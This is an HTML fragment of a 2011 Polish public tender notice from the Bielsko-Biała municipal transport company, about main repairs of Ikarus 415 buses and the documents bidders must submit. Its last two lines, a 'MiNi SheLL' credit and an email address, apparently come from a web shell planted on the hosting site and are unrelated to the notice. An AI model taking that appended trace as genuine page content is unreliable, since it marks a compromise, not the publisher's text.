Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego powyżej.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Wykaz (Załącznik Nr 4 do SIWZ) wykonanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał co najmniej 4 naprawy główne autobusów typu Ikarus 415 z wymianą kratownicy podwozia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, na kwotę min. 300 tys. zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wartości podane w walutach innych niż PLN zostaną przeliczone na PLN według kursów średnich walut podanych przez Narodowy Bank Polski w dniu ukazania się ogłoszenia w przedmiotowym postępowaniu w Dzienniku Urzędowym Unii Europejskiej.
Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 Pzp polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b Pzp wymaga przedłożenia informacji, 
o której mowa powyżej,  dotyczącej tych podmiotów.

2.	Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia, na kwotę nie mniejszą niż 500 tys. zł. 

3.	Zamawiający zaleca dołączenie dowodu wniesienia wadium (z uwzględnieniem informacji zawartej w Części IX ust. 4).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Pzp zakazuje się zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem:
1.	zmiany przepisów prawa w taki sposób, że zapisy umowy będą sprzeczne z tymi (nowymi) przepisami, np. zmiana stawki VAT, 
2.	gdy wobec jednej ze Stron wszczęto postępowanie likwidacyjne, wówczas obie Strony mogą rozwiązać umowę w każdym czasie ze skutkiem natychmiastowym, 
3.	wystąpienia okoliczności, o których żadna ze stron nie wiedziała w chwili podpisania umowy, a okoliczności te spowodują, że realizacja umowy na pierwotnych warunkach jest, albo niemożliwa do realizacji, albo niekorzystna dla Zamawiającego, 
4.	gdy Wykonawca zastosuje lepsze materiały/komponenty/składniki, od tych które przewidziano w ofercie, 
5.	gdy Wykonawca zrealizuje umowę wg lepszej technologii, przy użyciu bardziej nowoczesnego sprzętu niż przewidziano w ofercie, 
6.	wystąpienia konieczności zmiany terminu, z przyczyn niezależnych od stron umowy. 
Zmiana umowy może nastąpić na wniosek jednej ze Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzkb-b.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) bezpłatnie - na stronie internetowej Zamawiającego; 2) odpłatnie - 50 zł (+ewentualne koszty przesyłki) - w siedzibie Zamawiającego; pok 200 (II p.). Kasa czynna od 8.30 do 14.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 09:30, miejsce: Miejski Zakład Komunikacyjny w Bielsku-Białej, ul. Długa 50, 43-309 Bielsko-Biała, pok.105 (Ip.)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com